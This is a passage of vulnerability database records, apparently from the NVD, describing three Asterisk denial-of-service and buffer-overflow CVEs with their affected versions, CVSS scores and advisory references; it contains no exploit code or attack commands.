              "matchCriteriaId": "5D1FBCC8-4637-4A67-BFFD-C052C3C03C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7307E10-9FA5-4940-B837-7936384F61DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3D0DC9D6-D4D6-46CB-98DA-F4FC1835B6B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBBD0747-F3FF-46D8-A3C4-8268E37BC5AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3F759F27-008E-47FB-AC0A-EF11DA19918E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D15C82BA-BD1F-4A19-A907-E6C30042F537",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E802481-C8BD-4218-8CDC-5DB112DA946C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6FC8A53-E3C0-4660-BE75-2B5B8B4F8160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C020CD-D0EA-4B3E-B33C-F900B08B28FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0004AADE-1652-4242-A97D-E9818FE03CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "543E9C91-60FE-43AE-9B94-08DD730BA814",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "252849FA-F46E-4F5A-A488-AA53574CA884",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EB89B4F-9546-4DF0-B69F-1B9F289BB1E6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E254415-1D59-4A77-80FB-AE3EF10FBB32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF2407D0-C324-45C4-9FBB-4294F747DBDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "F23A36CC-9AA2-4559-946D-6D0621664342",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "89C40652-E180-416A-B88A-E6313530E98A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "A28C2C5D-A573-4036-A600-BE28A3E417B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.15:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EE162390-359F-4C5D-902B-275FB1FC3EF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A0A3750-0D34-4FB5-B897-17CA0D0B7CE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "D11BE58D-5B7E-4BB5-988A-7FC2E4B92C4F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "22631AE6-5DA1-46C6-A239-C232DA0D0E7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9F5CB8CC-4CC1-4A1B-8AD1-C876D1BC80EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8591DB43-EAA0-4D58-BA23-EAD916DEA3DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "4E4747F8-1AFC-4AEF-82D8-D6604FB5222E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B82172C9-EA5B-4FC9-A445-0A297AE56FF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0C71CDAB-A299-4F1D-942D-851C899E63BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E2FA9AB9-4C83-45A3-9772-3A16030DBF1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "A88C639A-9229-4D99-9087-1B0B95539BD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0B7DE987-7351-495A-8776-37E6B7BF0C0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CB5823CC-941F-47AB-AD1F-325181D40E60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "712AF374-846D-4F21-91C4-1BA9AB33E46D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "E431AF4E-C6A8-424F-9205-01F5FDFB3306",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "52BE29C5-C2C3-4414-A8E1-4D4D926F6E65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "87BBDF0F-7A23-48BA-98BC-0EDEDD2CDDF8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 do not restrict the number of unauthenticated sessions to certain interfaces, which allows remote attackers to cause a denial of service (file descriptor exhaustion and disk space exhaustion) via a series of TCP connections."
    },
    {
      "lang": "es",
      "value": "Asterisk Open Source v1.4.x antes de v1.4.40.1, v1.6.1.x antes de v1.6.1.25, v1.6.2.x antes v1.6.2.17.3, y v1.8.x antes de v1.8.3.3 y Asterisk Business Edition Cxx antes vC.3.6 0.4 no restringen el n\u00famero de sesiones no autenticadas a ciertas interfaces, que permite a atacantes remotos provocar una denegaci\u00f3n de servicio (agotamiento de descriptor de archivo y el agotamiento de espacio en disco) a trav\u00e9s de una serie de conexiones TCP."
    }
  ],
  "id": "CVE-2011-1507",
  "lastModified": "2024-11-21T01:26:28.133",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-04-27T00:55:04.523",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2011-005.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/44197"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/44529"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1025432"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2011/dsa-2225"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/1086"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2011/1107"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2011/1188"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=698916"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2011-005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/44197"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/44529"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1025432"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2011/dsa-2225"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/1086"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2011/1107"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2011/1188"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=698916"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-399"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2018-02-22 00:29

Modified

2024-11-21 04:11

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

A Buffer Overflow issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. When processing a SUBSCRIBE request, the res_pjsip_pubsub module stores the accepted formats present in the Accept headers of the request. This code did not limit the number of headers it processed, despite having a fixed limit of 32. If more than 32 Accept headers were present, the code would write outside of its memory and cause a crash.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2018-004.html	Patch, Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/103151	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id/1040416	Third Party Advisory, VDB Entry
cve@mitre.org	https://www.debian.org/security/2018/dsa-4320	Third Party Advisory
cve@mitre.org	https://www.exploit-db.com/exploits/44184/	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2018-004.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/103151	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1040416	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2018/dsa-4320	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/44184/	Exploit, Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	13.18
digium	certified_asterisk	13.18
digium	certified_asterisk	*
debian	debian_linux	9.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E88E5DD3-A16C-4026-A7E3-02C5C8AEFA0C",
              "versionEndIncluding": "13.19.1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BBC6235-486B-46AE-96C1-A8F5B68A1D96",
              "versionEndIncluding": "14.7.5",
              "versionStartIncluding": "14.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D63485A9-4464-49C7-ACF8-826303D8C152",
              "versionEndIncluding": "15.2.1",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "05795EED-0473-4806-A9AD-FD92212CCC77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "C3F701AA-E842-4680-9747-000C3A4F6E4B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "56E4037E-1F6F-4E1A-8549-38219F0A8E91",
              "versionEndIncluding": "13.18",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A Buffer Overflow issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. When processing a SUBSCRIBE request, the res_pjsip_pubsub module stores the accepted formats present in the Accept headers of the request. This code did not limit the number of headers it processed, despite having a fixed limit of 32. If more than 32 Accept headers were present, the code would write outside of its memory and cause a crash."
    },
    {
      "lang": "es",
      "value": "Se ha descubierto un problema de desbordamiento de b\u00fafer en Asterisk hasta la versi\u00f3n 13.19.1; versiones 14.x anteriores a la 14.7.5 y las versiones 15.x anteriores a la 15.2.1, as\u00ed como Certified Asterisk hasta la versi\u00f3n 13.18-cert2. Al procesar una petici\u00f3n SUBSCRIBE, el m\u00f3dulo res_pjsip_pubsub almacena los formatos aceptados presentes en las cabeceras Accept de la petici\u00f3n. Este c\u00f3digo no limitaba el n\u00famero de cabeceras que procesaba, a pesar de tener un l\u00edmite fijado en 32. Si estuviesen presentes m\u00e1s de 32 cabeceras Accept, el c\u00f3digo escribir\u00eda fuera de la memoria y provocar\u00eda un cierre inesperado."
    }
  ],
  "id": "CVE-2018-7284",
  "lastModified": "2024-11-21T04:11:56.303",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-02-22T00:29:01.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2018-004.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/103151"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040416"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2018/dsa-4320"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/44184/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2018-004.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/103151"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040416"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2018/dsa-4320"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/44184/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2013-01-04 15:55

Modified

2024-11-21 01:45

Severity ?

Summary

Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones, when anonymous calls are enabled, allow remote attackers to cause a denial of service (resource consumption) by making anonymous calls from multiple sources and consequently adding many entries to the device state cache.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2012-015	Vendor Advisory
cve@mitre.org	http://www.debian.org/security/2013/dsa-2605
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-20175	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2012-015	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2013/dsa-2605
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-20175	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.1
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.1
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.12
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.1
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.1
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.1
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.1
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.1
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.1
digium	asterisk	10.1.2
digium	asterisk	10.1.3
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.1
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.1
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.1
digium	asterisk	10.4.2
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.1
digium	asterisk	10.5.2
digium	asterisk	10.6.0
digium	asterisk	10.6.0
digium	asterisk	10.6.0
digium	asterisk	10.6.0
digium	asterisk	10.6.1
digium	asterisk	10.6.1
digium	asterisk	10.7.0
digium	asterisk	10.7.0
digium	asterisk	10.7.0
digium	asterisk	10.7.1
digium	asterisk	10.8.0
digium	asterisk	10.8.0
digium	asterisk	10.8.0
digium	asterisk	10.9.0
digium	asterisk	10.9.0
digium	asterisk	10.9.0
digium	asterisk	10.9.0
digium	asterisk	10.10.0
digium	asterisk	10.10.0
digium	asterisk	10.10.0
digium	asterisk	10.10.1
digium	asterisk	10.11.0
digium	asterisk	10.11.0
digium	asterisk	10.11.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.1
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.1
digium	asterisk	10.5.2
digium	asterisk	10.6.0
digium	asterisk	10.6.1
digium	asterisk	10.7.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AEE324AC-5231-43DB-B077-EA1E0145FF5B",
              "versionEndIncluding": "1.8.19.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
